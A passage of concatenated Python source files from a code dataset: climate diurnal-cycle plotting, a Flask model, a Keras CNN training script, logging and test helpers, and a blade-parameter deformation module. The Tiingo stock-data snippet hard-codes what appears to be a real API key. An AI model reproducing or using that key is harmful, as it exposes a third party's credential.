os.path.join(inp_path, member_str, 'nPS.nc')\n ps = xr.open_dataset(path, )['PS']\n ps = ps.sel(rlon=slice(domain['rlon'][0],domain['rlon'][1]),\n rlat=slice(domain['rlat'][0],domain['rlat'][1]))\n\n path = os.path.join(inp_path, member_str, 'zT.nc')\n temp = xr.open_dataset(path, )['T']\n temp = temp.sel(rlon=slice(domain['rlon'][0],domain['rlon'][1]),\n rlat=slice(domain['rlat'][0],domain['rlat'][1]),\n altitude=domain['altitudes'])\n\n # select time\n ps = ps.sel(time=slice(start_time,end_time))\n temp = temp.sel(time=slice(start_time,end_time))\n\n # aggregate\n ps = ps.mean(dim=['rlon', 'rlat'])\n temp = temp.mean(dim=['rlon', 'rlat', 'altitude'])\n #from scipy import signal\n #plt.plot(temp)\n #old_mean = np.mean(temp.values)\n #temp.values = signal.detrend(temp.values)\n #temp.values = temp.values + old_mean\n #plt.plot(temp)\n #plt.show()\n #quit()\n\n # calculate anomalies\n ps = ps - ps.mean()\n temp = temp - temp.mean()\n\n all_fields_disagg['PS'] = ps\n all_fields_disagg['T'] = temp\n\n #calculate diurnal cycle and store\n ps = calc_mean_diurnal_cycle(ps).values\n ps = np.append(ps, ps[0])\n temp = calc_mean_diurnal_cycle(temp).values\n temp = np.append(temp, temp[0])\n\n all_fields['PS'] = ps\n all_fields['T'] = temp\n members[member_str] = all_fields\n members_disagg[member_str] = all_fields_disagg\n\n # Calculate total flux difference between RAW and SM\n for res in resolutions:\n RAW_str = 'RAW'+str(res)\n SM_str = 'SM'+str(res)\n DIFF_str = 'DIFF'+str(res)\n # diurnal\n members[DIFF_str] = {}\n members[DIFF_str]['PS'] = members[RAW_str]['PS'] - members[SM_str]['PS']\n members[DIFF_str]['T'] = members[RAW_str]['T'] - members[SM_str]['T']\n\n members_disagg[DIFF_str] = {}\n members_disagg[DIFF_str]['PS'] = (members_disagg[RAW_str]['PS'] - \n members_disagg[SM_str]['PS'])\n members_disagg[DIFF_str]['T'] = (members_disagg[RAW_str]['T'] -\n members_disagg[SM_str]['T'])\n\n pickle.dump(members, open(pickle_save_file_2, 'wb'))\n pickle.dump(members_disagg, open(pickle_save_file_4, 'wb'))\n timer.stop('compute 2')\n\n #members alpine pumping\n members_ap = pickle.load(open(pickle_save_file, 'rb'))\n #members alpine pumping disaggregated\n members_ap_disagg = pickle.load(open(pickle_save_file_3, 'rb'))\n #members surface pressure and temperature\n members_tp = pickle.load(open(pickle_save_file_2, 'rb'))\n #members surface pressure and temperature disaggregated\n members_tp_disagg = pickle.load(open(pickle_save_file_4, 'rb'))\n\n t_end = time.time()\n print('Computation complete. Took ' + \n str(round(t_end - t_start,0)) + ' sec.')\n\n timer.start('plot')\n if i_plot == 1: \n panel_labels = ['a)','d)', 'g)', 'b)', 'e)', 'h)', 'c)', 'f)', 'i)']\n lind = 0\n fig,axes = plt.subplots(3,3, figsize=(11,11))\n for colI in range(3):\n mem_key = mem_keys[colI]\n mem_label = mem_labels[colI]\n for rowI in range(3):\n #print(y_labels[rowI])\n ax = axes[rowI, colI]\n #member_type = axes_config[axI]['mem']\n if colI == 2:\n ax.set_ylim(ylims[rowI]['diff'])\n else:\n ax.set_ylim(ylims[rowI]['models'])\n ax.axhline(y=0, color='k', lineWidth=1)\n ax.set_xticks([0,6,12,18,24])\n ax.set_xlim((0,24))\n ax.grid()\n if colI == 0:\n ax.set_ylabel(y_labels[rowI],fontsize=labelsize)\n if rowI == 0:\n ax.set_title(mem_label,fontsize=titlesize)\n elif rowI == 1:\n ax.set_xlabel('Time (UTC)',fontsize=labelsize)\n\n handles = []\n for res in resolutions:\n mem_res_key = mem_key+res\n if rowI == 0:\n if mem_key == 'DIFF':\n key = '{}_'.format(plot_flux)+mem_res_key\n vals = members_ap[key]\n vals = np.append(vals, vals[0])\n vals_disagg = members_ap_disagg[key]\n else:\n field = members_ap[mem_res_key][plot_flux]\n vals = np.append(field.values, field.values[0])\n vals_disagg = members_ap_disagg[mem_res_key][plot_flux]\n elif rowI == 1:\n vals = members_tp[mem_res_key]['PS']\n vals_disagg = members_tp_disagg[mem_res_key]['PS']\n elif rowI == 2:\n vals = members_tp[mem_res_key]['T']\n vals_disagg = members_tp_disagg[mem_res_key]['T']\n #hours = np.append(field.coords['diurnal'].values, 24)\n hours = np.arange(0, 25)\n line, = ax.plot(hours, vals, color=plot_dict['res_color'][res],\n label=mem_res_key)\n handles.append(line)\n\n if (res == '1'):\n #print(vals_disagg)\n day_range = np.arange(start_time, end_time+timedelta(days=1),\n timedelta(days=1))\n all_days = np.zeros((9,25))\n hours = np.arange(0, 25)\n for dayI in range(len(day_range)-1):\n this_day = '{:%Y-%m-%d}-00'.format(dt64_to_dt(day_range[dayI]))\n next_day = '{:%Y-%m-%d}-00'.format(dt64_to_dt(day_range[dayI+1]))\n vals = vals_disagg.loc[this_day:next_day].values\n all_days[dayI,:] = vals\n #for dayI in range(len(day_range)-1):\n # ax.plot(hours, all_days[dayI,:], color=plot_dict['res_color'][res],\n # label=mem_res_key, linewidth=0.5)\n quantiles = np.percentile(all_days, percentiles, axis=0)\n ax.fill_between(hours, quantiles[0,:], quantiles[1,:], color='red',\n alpha=0.2, edgecolor='')\n # significance testing\n #test_type = 'ttest'\n test_type = 'wilcox'\n if test_type == 'ttest':\n from scipy.stats import ttest_1samp\n if test_type == 'wilcox':\n from scipy.stats import wilcoxon\n if mem_key == 'DIFF':\n for hI in range(len(hours)-1):\n if test_type == 'ttest':\n pval = ttest_1samp(all_days[:,hI], 0).pvalue\n elif test_type == 'wilcox':\n pval = wilcoxon(all_days[:,hI].squeeze()).pvalue\n #pval = '{:2.2f}'.format(pval)\n if (pval < 0.05):\n plot_hr = hours[hI]\n if plot_hr == 0: plot_hr = 24\n print(plot_hr)\n ax.text(plot_hr-0.6, ax.get_ylim()[1]*0.87,\n '*', color='red')\n\n if (rowI == 0) and (colI < 2):\n ax.legend(handles=handles) \n\n\n # make panel label\n pan_lab_x = ax.get_xlim()[0]\n pan_lab_y = ax.get_ylim()[1] + (ax.get_ylim()[1] - ax.get_ylim()[0]) * 0.05\n ax.text(pan_lab_x,pan_lab_y,panel_labels[lind], fontsize=15, weight='bold')\n lind += 1\n\n fig.subplots_adjust(wspace=0.23, hspace=0.3,\n left=0.08, right=0.98, bottom=0.20, top=0.95)\n\n plot_path = plot_path + '/' + plot_name\n print('save figure to {}'.format(plot_path))\n if i_save_fig == 1:\n plot_path = plot_path + '.png'\n print(plot_path)\n plt.savefig(plot_path, format='png', bbox_inches='tight')\n plt.close(fig)\n elif i_save_fig == 2:\n plot_path = plot_path + '.pdf'\n print(plot_path)\n plt.savefig(plot_path, format='pdf', bbox_inches='tight')\n plt.close('all')\n else:\n plt.show()\n plt.close(fig)\n\n\n timer.stop('plot')\n timer.print_report()\n \n\n\n\n\n","sub_path":"PUB/fig_10.py","file_name":"fig_10.py","file_ext":"py","file_size_in_byte":23761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"132761473","text":"from datetime import datetime\r\nimport sys\r\nimport os\r\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\r\nfrom flask import current_app\r\nfrom database.database import db\r\nfrom sqlalchemy import or_, desc\r\n\r\n\r\nclass Koe(db.Model):\r\n __tablename__ = 'koe'\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n title = db.Column(db.String(25), nullable=False)\r\n text = db.Column(db.Text, nullable=False)\r\n created_at = db.Column(db.DateTime, nullable=False, default=datetime.now)\r\n updated_at = db.Column(db.DateTime, nullable=False, default=datetime.now, onupdate=datetime.now)\r\n user_id = db.Column(db.Integer, db.ForeignKey('user.id', onupdate='CASCADE', ondelete='CASCADE'))\r\n item_id = db.Column(db.Integer, db.ForeignKey('item.id', onupdate='CASCADE', ondelete='CASCADE'))\r\n item = db.relationship('Item', primaryjoin='Koe.item_id==Item.id', backref='koes')\r\n favorites = db.relationship('KoeFavorite', backref='koe')\r\n\r\n def __init__(self, title='', text='', user_id='', item_id=''):\r\n self.title = title\r\n self.text = text\r\n self.user_id = user_id\r\n self.item_id = item_id\r\n\r\n def postRecord(self):\r\n db.session.add(self)\r\n db.session.commit()\r\n return self\r\n\r\n @classmethod\r\n def getRecordById(cls, koe_id):\r\n record = cls.query.filter_by(id=koe_id).first()\r\n return record\r\n\r\n @classmethod\r\n def getRecordsBySearch(cls, args):\r\n records = cls.query\r\n for k, v in args.items():\r\n if (k == 'text'):\r\n records = records.filter(or_(cls.title.like('%' + v + '%'),\r\n cls.text.like('%' + v + '%')))\r\n if (k == 'order_by'):\r\n order_by = v\r\n\r\n if (int(v) == 1):\r\n current_app.logger.debug(order_by)\r\n records = records.order_by(desc(cls.updated_at))\r\n\r\n\r\n records = records.all()\r\n return records\r\n\r\n @classmethod\r\n def getRecordsByItem(cls, item_id):\r\n record = cls.query.filter_by(item_id=item_id).order_by(desc(cls.updated_at)).all()\r\n return record\r\n\r\n @classmethod\r\n def getRecordsByPostUser(cls, user_id):\r\n record = cls.query.filter_by(user_id=user_id).order_by(desc(cls.updated_at)).all()\r\n return record\r\n\r\n @classmethod\r\n def getRecordsByCatchUser(cls, user_id):\r\n record = cls.query.filter(cls.item.has(user_id=user_id)).order_by(desc(cls.updated_at)).all()\r\n return record\r\n\r\n @classmethod\r\n def getRecordsByNew(cls):\r\n record = cls.query.order_by(desc(cls.updated_at)).all()\r\n return record\r\n\r\n @classmethod\r\n def addTestData(cls):\r\n categories = []\r\n data_lists = ['grain', 'vegetable', 'fruit', 'other']\r\n for data in data_lists:\r\n categories.append(cls(data))\r\n\r\n db.session.add_all(categories)\r\n db.session.commit()\r\n","sub_path":"deploy/api/src/models/koe.py","file_name":"koe.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"7013801","text":"from hnzView import View\r\nfrom hnzController import Controller\r\nfrom tkinter import *\r\nfrom pubsub import pub\r\nimport vUtility\r\n\r\n\r\nif __name__ == \"__main__\":\r\n mainwin = Tk()\r\n WIDTH = vUtility.windowWidth\r\n HEIGHT = vUtility.windowHeight\r\n mainwin.geometry(\"%sx%s\" % (WIDTH, HEIGHT))\r\n #mainwin.resizable(0, 0)\r\n mainwin.title(\"Graphic Neural Network\")\r\n #create view and controller\r\n controller=Controller()\r\n view=View(mainwin)\r\n #cross lin view and controller\r\n controller.setView(view)\r\n view.setController(controller)\r\n #setup and complete view\r\n view.setup()\r\n mainwin.mainloop()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"31245713","text":"import logging\nimport time\nfrom logging.handlers import RotatingFileHandler\n\n\ndef myLog(name):\n logger = logging.getLogger(name)\n logger.setLevel(logging.INFO)\n f_format = logging.Formatter(\n '[%(created)f]-[%(levelname)s ]-[%(filename)s]-[%(name)s]-[%(lineno)d]-[%(funcName)s]-[%(message)s]'\n )\n # add a rotating handler\n handler = RotatingFileHandler(\"test.log\", maxBytes=300, backupCount=5)\n handler.setFormatter(f_format)\n logger.addHandler(handler)\n\n\n# logger.warning('This will get logged to a file')\n# logger.info(\"Admin had logged in ...\")","sub_path":"libs/myLogger.py","file_name":"myLogger.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"412434778","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport tiingo\n\n\n# In[2]:\n\n\nget_ipython().system('pip show tiingo')\n\n\n# In[3]:\n\n\nfrom tiingo import TiingoClient\nconfig = {}\n\n# To reuse the same HTTP Session across API calls (and have better performance), include a session key.\nconfig['session'] = True\n\n# If you don't have your API key as an environment variable,\n# pass it in via a configuration dictionary.\nconfig['api_key'] = \"5ad45e5247e9f3ddc3a85005ea92c69d1bc4a552\"\n\n# Initialize\nclient = TiingoClient(config)\n\n\n# In[4]:\n\n\nclient.get_dataframe('GOOGL',\n #\"000001.sh\",\n # tickers='000001',\n #frequency='1Min',\n #frequency='day',\n startDate='2017-05-15',\n endDate='2018-05-31')\n\n","sub_path":"tiingo_美股日解决方案.py","file_name":"tiingo_美股日解决方案.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"504120570","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 20 09:59:18 2020\r\n\r\n@author: 56977\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndef plotting(names):\r\n absisas = [10,20,50,100,200,500,1000,2000,5000,10000,20000]\r\n TPO = [0.01e-3,0.1e-3,1e-3,1e-2,0.1,1.,10.,60.,60*10,60*100]\r\n TPO_label = [\"0.01 ms\",\"0.1 ms\", \"1 ms\", \"10 ms\", \"0.1 s\", \"1 s\", \"10 s\", \"1 min\", \"10 min\"]\r\n \r\n plt.figure()\r\n dtsy1 = []\r\n dtsy2 = []\r\n for name in names:\r\n data = np.loadtxt(name)\r\n Ns = data[:, 0]\r\n dts1 = data[:, 1]\r\n dts1max = max(dts1)\r\n Nsmax = max(Ns)\r\n dts2 = data[:, 2]\r\n dts2max = max(dts2)\r\n dtsy1=0*Ns+dts1max\r\n dtsy2=0*Ns+dts2max\r\n \r\n plt.subplot(2,1,1)\r\n plt.title(\"A_invB_Solve_llena\")\r\n plt.ylim([0.01e-3,100])\r\n plt.loglog(Ns, dts1.T, \"k-o\", alpha=0.4,markersize=3)\r\n plt.ylabel(\"Tiempo de ensamblado\")\r\n \r\n \r\n plt.subplot(2,1,2)\r\n plt.ylim([0.01e-3,100])\r\n plt.loglog(Ns, dts2.T, \"k-o\", alpha=0.4,markersize=3)\r\n plt.ylabel(\"Tiempo de solucion\")\r\n plt.xlabel(\"Tamaño matriz N\")\r\n \r\n plt.subplot(2,1,1)\r\n plt.plot(Ns,dtsy1, \"c--\") \r\n plt.loglog(Ns,Ns*(dts1max/Nsmax),\"y--\")\r\n plt.plot(Ns,Ns**2*(dts1max/Nsmax**2),\"g--\")\r\n plt.plot(Ns,Ns**3*(dts1max/Nsmax**3),\"r--\")\r\n plt.plot(Ns,Ns**4*(dts1max/Nsmax**4),\"m--\")\r\n plt.xticks(absisas,[])\r\n plt.yticks(TPO,TPO_label)\r\n plt.subplot(2,1,2)\r\n plt.plot(Ns,dtsy2, \"c--\",label=\"Constante\") \r\n plt.loglog(Ns,Ns*(dts2max/Nsmax),\"y--\",label=\"O(N)\")\r\n plt.plot(Ns,Ns**2*(dts2max/Nsmax**2),\"g--\",label=\"O(N^2)\")\r\n plt.plot(Ns,Ns**3*(dts2max/Nsmax**3),\"r--\",label=\"O(N^3)\")\r\n plt.plot(Ns,Ns**4*(dts2max/Nsmax**4),\"m--\",label=\"O(N^4)\")\r\n plt.xticks(absisas,absisas,rotation=45)\r\n plt.yticks(TPO,TPO_label)\r\n \r\n \r\n plt.tight_layout()\r\n plt.legend(loc=\"upper left\")\r\n plt.show()\r\n \r\nnames = [\"A_invB_Solve_llena0.txt\",\"A_invB_Solve_llena1.txt\",\"A_invB_Solve_llena2.txt\",\"A_invB_Solve_llena3.txt\",\"A_invB_Solve_llena4.txt\"]\r\nplotting(names)\r\n\r\n","sub_path":"Entrega 7/Plot_A_invB_Solve_llena.py","file_name":"Plot_A_invB_Solve_llena.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"103930034","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 11 10:12:49 2019\n\n@author: DELL\n\"\"\"\n\nfrom sklearn.preprocessing import LabelBinarizer\nfrom miniGoogleNet import MiniGoogleNet\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import LearningRateScheduler\nfrom keras.optimizers import SGD\nfrom keras.datasets import cifar10\n\nNUM_EPOCHS = 70\nINIT_LR = 5e-3\n\ndef poly_decay(epoch):\n maxEpoch = NUM_EPOCHS\n baseLR = INIT_LR\n power = 1.0\n alpha = baseLR * (1 - epoch / float(maxEpoch)) ** power\n # Return new learning rate \n return alpha\n\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\nX_train = X_train.astype('float')/255\nX_test = X_test.astype('float')/255\n\nlb = LabelBinarizer()\ny_train = lb.fit_transform(y_train)\ny_test = lb.fit_transform(y_test)\n\naug = ImageDataGenerator(width_shift_range=0.1, height_shift_range=0.1, horizontal_flip=True, fill_mode='nearest')\n\ncallbacks = [LearningRateScheduler(poly_decay)]\n\nopt = SGD(lr = INIT_LR, momentum=0.9)\nmodel = MiniGoogleNet.build(32, 32, 3, 10)\nmodel.compile(opt, 'categorical_crossentropy', ['accuracy'])\nH = model.fit_generator(aug.flow(X_train, y_train, batch_size=64), validation_data=(X_test, y_test),\n steps_per_epoch=len(X_train)//64, epochs=NUM_EPOCHS, callbacks=callbacks, verbose=1)","sub_path":"NeurualNetwork/ConvolutionNeuralNetwork/miniGoogleNet_cifar10.py","file_name":"miniGoogleNet_cifar10.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9167093","text":"# Test main.py scripts\nimport unittest\nfrom unittest.mock import MagicMock, patch\n\nfrom xlambda_helper import main, constants\n\n\nclass TestMainScript(unittest.TestCase):\n\n def setUp(self):\n # Setup objects for the tests\n self.non_warm = {\n 'foo': 'bar',\n 'hello': 'world',\n }\n\n self.warm_no_method = {\n 'xlambda': {\n 'action': 'warm_up',\n 'settings': {\n 'startup_time': 1234,\n },\n },\n }\n\n self.warm_whatever_method = {\n 'xlambda': {\n 'action': 'warm_up',\n 'settings': {\n 'startup_time': 1234,\n 'warm_method': 'whatever',\n },\n },\n }\n\n def test_class_non_warm_request(self):\n # Test a non-warm request\n request = main.XLambdaRequest(self.non_warm)\n\n self.assertEqual(request.action, None)\n self.assertEqual(request.settings, None)\n self.assertEqual(request.is_warm_request, None)\n self.assertEqual(request.warm_method, constants.DEFAULT_WARM_METHOD)\n self.assertEqual(request.startup_time, None)\n\n def test_class_warm_no_method(self):\n # Test a warm request with no method specified\n request = main.XLambdaRequest(self.warm_no_method)\n\n self.assertEqual(request.action, 'warm_up')\n self.assertTrue(type(request.settings), dict)\n self.assertEqual(request.is_warm_request, True)\n self.assertEqual(request.warm_method, constants.DEFAULT_WARM_METHOD)\n self.assertEqual(request.startup_time, 1234)\n\n def test_class_warm_method_specified(self):\n # Test a warm request specifying a method\n request = main.XLambdaRequest(self.warm_whatever_method)\n\n self.assertEqual(request.warm_method, 'whatever')\n\n def test_wrapper_non_warm_request(self):\n # Test a non-warm request\n handler = MagicMock()\n\n wrapper = main.warm(handler=handler)\n\n wrapper(event=self.non_warm, context={})\n\n handler.assert_called()\n handler.assert_called_with(\n event=self.non_warm,\n context={},\n )\n\n @patch('xlambda_helper.main.time')\n def test_wrapper_warm_request_not_cold(self, time):\n # Test a warm request\n constants.IS_COLD_START = False\n\n handler = MagicMock()\n\n wrapper = main.warm(handler=handler)\n\n response = wrapper(event=self.warm_no_method, context={})\n\n handler.assert_not_called()\n time.sleep.assert_called()\n time.sleep.assert_called_with(\n self.warm_no_method['xlambda']['settings']['startup_time'] / 1000)\n\n self.assertIsInstance(response, dict)\n self.assertIn('status', response)\n self.assertIn('xlambda_warmed', response)\n self.assertEqual(response['status'], 200)\n self.assertEqual(response['xlambda_warmed'], True)\n\n @patch('xlambda_helper.main.time')\n def test_wrapper_warm_request_is_cold(self, time):\n # Test a warm request\n constants.IS_COLD_START = True\n\n handler = MagicMock()\n\n wrapper = main.warm(handler=handler)\n\n wrapper(event=self.warm_no_method, context={})\n\n handler.assert_not_called()\n time.sleep.assert_not_called()\n\n @patch('xlambda_helper.main.logger')\n @patch('xlambda_helper.main.XLambdaRequest')\n def test_wrapper_exception(self, XLambdaRequest, logger):\n # Test in the event of an exception while handling a request\n error = KeyError('This is a mock error.')\n\n XLambdaRequest.side_effect = error\n\n handler = MagicMock()\n\n wrapper = main.warm(handler=handler)\n\n wrapper(event=self.non_warm, context={})\n\n handler.assert_called()\n handler.assert_called_with(\n event=self.non_warm,\n context={},\n )\n\n logger.error.assert_called()\n logger.exception.assert_called()\n logger.exception.assert_called_with(error)\n","sub_path":"tests/test_xlambda.py","file_name":"test_xlambda.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"213851784","text":"\"\"\"\nModule to deform blade's parameters, based on a given parameter file.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom .ndinterpolator import reconstruct_f, scipy_bspline\nfrom .params import ParamFile\n\n\nclass Deformation(object):\n \"\"\"\n Deform parameter curves {chord, pitch, rake, skew, camber} according to\n specific information passed through a parameter file.\n\n The module contains several methods that are able to:\n\n 1. compute coordinates of the optimal control points, provided their\n number from the parameter file.\n\n 2. update control points Y coordinates, provided the magnitude of the\n Y deformation from the parameter file.\n\n 3. generate B-spline curve using the computed control points (before or\n after their deformation), provided npoints from the parameter file\n for spline estimation.\n\n 4. plot parametric curves, with several options. Finally export a new\n parameter file containing the new deformed parameters.\n\n :param str paramfile: parameter file name\n :cvar str paramfile: parameter file name\n :cvar class param: class object instantiated by the module params, and\n contains all the attributes assigned by reading the parameter file.\n Possible attributes are:\n\n - `param.radii`\n - `param.parameters`\n - `param.nbasis`\n - `param.degree`\n - `param.deformations`\n\n First attribute is array defines the radial sections, while the\n remaining attributes are dictionaries with possible keys: `chord`,\n `pitch`, `rake`, `skew`, `camber`.\n\n :cvar dict deformed_parameters: dictionary that contains the deformed\n parameters at the same radial sections, provided some tolerance due to\n the spline interpolation. Possible dictionary keys are the parameters\n `chord`, `pitch`, `rake`, `skew`, `camber`. Default value is array of\n zeros with length equal to the radial sections.\n :cvar dict control_points: dictionary that contains the 2D coordinates of\n the control points associated with the B-spline parametric curve. The\n dictionary possible keys are the parameters `chord`, `pitch`, `rake`,\n `skew`, `camber`. Default value is None\n :cvar dict spline: dictionary that contains the B-spline interpolation for\n the parametric curves. The dictionary possible keys are the parameters\n `chord`, `pitch`, `rake`, `skew`, `camber`. Each value is a 2D numpy\n array containing the radii interpolations against the interpolations\n for one of the parameters mentioned in the dictionary keys. Default\n value is None.\n \"\"\"\n\n def __init__(self, paramfile):\n self.paramfile = paramfile\n self.param = ParamFile()\n self.param.read_parameters(filename=paramfile)\n self.deformed_parameters = {\n 'chord': np.zeros(self.param.radii.size),\n 'pitch': np.zeros(self.param.radii.size),\n 'rake': np.zeros(self.param.radii.size),\n 'skew': np.zeros(self.param.radii.size),\n 'camber': np.zeros(self.param.radii.size)\n }\n self.control_points = {\n 'chord': None,\n 'pitch': None,\n 'rake': None,\n 'skew': None,\n 'camber': None\n }\n self.spline = {\n 'chord': None,\n 'pitch': None,\n 'rake': None,\n 'skew': None,\n 'camber': None\n }\n\n @staticmethod\n def _optimum_control_points(X, Y, degree, nbasis, rbf_points):\n \"\"\"\n Private static method that computes the optimum coordinates of the\n B-spline control points.\n\n :param array_like X: Array of original points of the parametric curve\n X-axis, usually array of the radii sections\n :param array_like Y: radial distribution of parameter `chord` or\n `pitch` or `rake` or `skew` or `camber`, corresponding to the\n radial sections in X\n :param int degree: degree of the B-spline construction for the\n parametric curve\n :param int nbasis: number of control points associated with the\n parametric curve\n :param int rbf_points: if specified greater than zero, then the X and Y\n arrays are interpolated using the Wendland C2 radial basis function\n to produce X and Y arrays with length = rbf_points. The larger\n number of rbf_points implies better estimation of the optimum\n control coordinates. To turn it off (i.e. compute control points\n based on original X, Y arrays) then insert 0. (Negative values or\n None results in same effect as zero)\n :return: control points 2D coordinates\n :rtype: numpy.ndarray\n \"\"\"\n if not isinstance(rbf_points, int):\n # in case inserted as None, then converts to zero,\n # otherwise returns the inserted value. Useful when dealing with\n # the parameter as a flag\n rbf_points = int(rbf_points or 0)\n\n if rbf_points > 0:\n xx = np.linspace(X[0], X[-1], num=rbf_points)\n yy = np.zeros(rbf_points)\n reconstruct_f(\n original_input=X,\n original_output=Y,\n rbf_input=xx,\n rbf_output=yy,\n basis='beckert_wendland_c2_basis',\n radius=2.0)\n X = xx\n Y = yy\n\n A = np.zeros((len(X), nbasis))\n At = np.zeros((len(X), nbasis - 2))\n\n for i in range(nbasis):\n cv_new = np.zeros((nbasis, 3))\n cv_new[i, 0] = 1.\n # i-th basis function in the reference space\n A[:, i] = scipy_bspline(cv_new, A.shape[0], degree)[:, 0]\n\n # A tilde for the constraints on the first and last point\n At = A[:, 1:-1]\n # x and y of the ctrl points with constrained least square.\n # we subtract the contribution of the first and last basis function\n cvt_x = np.linalg.lstsq(\n At, X - A[:, 0] * X[0] - A[:, -1] * X[-1], rcond=-1)[0]\n cvt_y = np.linalg.lstsq(\n At, Y - A[:, 0] * Y[0] - A[:, -1] * Y[-1], rcond=-1)[0]\n\n # fill with the constraints the first and last point\n opt_ctrl = np.zeros((nbasis, 2))\n opt_ctrl[0, 0] = X[0]\n opt_ctrl[-1, 0] = X[-1]\n opt_ctrl[0, 1] = Y[0]\n opt_ctrl[-1, 1] = Y[-1]\n opt_ctrl[1:-1, 0] = cvt_x\n opt_ctrl[1:-1, 1] = cvt_y\n\n return opt_ctrl\n\n @staticmethod\n def _check_param(param):\n \"\"\"\n Private static method that checks the passed parameter.\n\n :param str param: passed parameter to check. Valid values\n are: `chord`, `pitch`, `rake`, `skew`, `camber`\n :raises ValueError: if the param value is not one of the previous\n \"\"\"\n params = ['chord', 'pitch', 'rake', 'skew', 'camber']\n if not param in params:\n raise ValueError(\n 'Valid param values are: \"chord\", \"pitch\", \"rake\", \"skew\",'\\\n ' \"camber\".')\n\n def _check_control_points(self, param):\n \"\"\"\n Private method to check if control points are computed.\n\n :param str param: passed parameter to check. Valid values\n are: `chord`, `pitch`, `rake`, `skew`, `camber`\n :raises ValueError: if the control points have None value, i.e. not\n computed\n \"\"\"\n if self.control_points[param] is None:\n raise ValueError(\n 'control_points has None value. You must compute them first.')\n\n def _check_spline(self, param):\n \"\"\"\n Private method to check if spline interpolation is computed.\n\n :param str param: passed parameter to check. Valid values\n are: `chord`, `pitch`, `rake`, `skew`, `camber`\n :raises ValueError: if the spline of that parameter curve has None\n value, i.e. not computed\n \"\"\"\n if self.spline[param] is None:\n raise ValueError(\n param + ' spline is None. You must first generate spline.')\n\n def _check_deformed(self, param):\n \"\"\"\n Private method to check if the deformed parameters are computed.\n\n :param str param: passed parameter to check. Valid values\n are: `chord`, `pitch`, `rake`, `skew`, `camber`\n :raises ValueError: if the deformed parameters have array of zeros,\n i.e. not computed\n \"\"\"\n if self.deformed_parameters[param].all() == 0:\n raise ValueError(param + ' deformed points are not computed.')\n\n def compute_control_points(self, param, rbf_points=1000):\n \"\"\"\n Compute the control points 2D coordinates for one of the parametric\n curves.\n\n :param str param: parameter corresponding to the parametric curve.\n possible values are `chord`, `pitch`, `rake`, `skew`, `camber`\n :param int rbf_points: if greater than zero then the Wendland C2 radial\n basis function is used to interpolate the original arrays for the\n parametric curve, so that the control points are computed according\n to the interpolated arrays. Needless to mention that longer arrays\n would produce better estimation of the control points optimum\n coordinates. In order to turn off the rbf interpolation: specify\n either 0 or -1 (Also a None value can be used too). Default value\n is 1000\n \"\"\"\n self._check_param(param=param)\n self.control_points[param] = self._optimum_control_points(\n X=self.param.radii,\n Y=self.param.parameters[param],\n degree=self.param.degree[param],\n nbasis=self.param.nbasis[param],\n rbf_points=rbf_points)\n\n def update_control_points(self, param):\n \"\"\"\n Update the control point Y coordinate with the deformation values\n specified in the parameter file.\n\n :param str param: parameter corresponding to the parametric curve.\n possible values are `chord`, `pitch`, `rake`, `skew`, `camber`\n \"\"\"\n self._check_param(param=param)\n self._check_control_points(param=param)\n\n if not self.control_points[param].shape[0] == len(\n self.param.deformations[param]):\n raise ValueError(\n 'array of deformations must equal to number of control points')\n\n for i in range(self.control_points[param].shape[0]):\n self.control_points[param][i, 1] += self.param.deformations[param][\n i]\n\n def generate_spline(self, param):\n \"\"\"\n Generate the B-spline interpolations, using the information: `degree`,\n `npoints` from the parameter file, as well as the computed 2D\n coordinates of the control points.\n\n :param str param: parameter corresponding to the parametric curve.\n possible values are `chord`, `pitch`, `rake`, `skew`, `camber`\n \"\"\"\n self._check_param(param=param)\n self._check_control_points(param=param)\n\n self.spline[param] = scipy_bspline(\n cv=self.control_points[param],\n npoints=self.param.npoints[param],\n degree=self.param.degree[param])\n\n def compute_deformed_parameters(self, param, tol=1e-3):\n \"\"\"\n This method uses the spline npoints interpolation of the parametric\n curve to extract the parameters corresponding to the radial\n distribution of the original undeformed array. Therefore the resulting\n deformed parameters should be arrays of same length like that of the\n original parameters.\n\n :param str param: parameter corresponding to the parametric curve.\n possible values are `chord`, `pitch`, `rake`, `skew`, `camber`\n :param float tol: tolerance required to find the B-spline estimation\n within the neighborhood of each of the radii sections. It is\n important to specify the value carefully as it depends on the order\n of the original array values, as well as the number of points for\n the spline interpolations. Default value is 1e-3\n \"\"\"\n self._check_param(param=param)\n self._check_spline(param=param)\n\n for i, val in enumerate(self.param.radii):\n index = np.where(np.fabs(self.spline[param][:, 0] - val) < tol)[0]\n if len(index) == 0:\n raise ValueError(\n 'Could not compute deformed parameter \"' + param +\n '\" at radius \"' + str(val) +\n '\". Either increase the tolerance for that parameter, or'\\\n ' increase the spline npoints in the parameter file.'\n )\n if index.shape[0] > 1:\n # In case more neighbors are found, then take first value only.\n index = index[0]\n 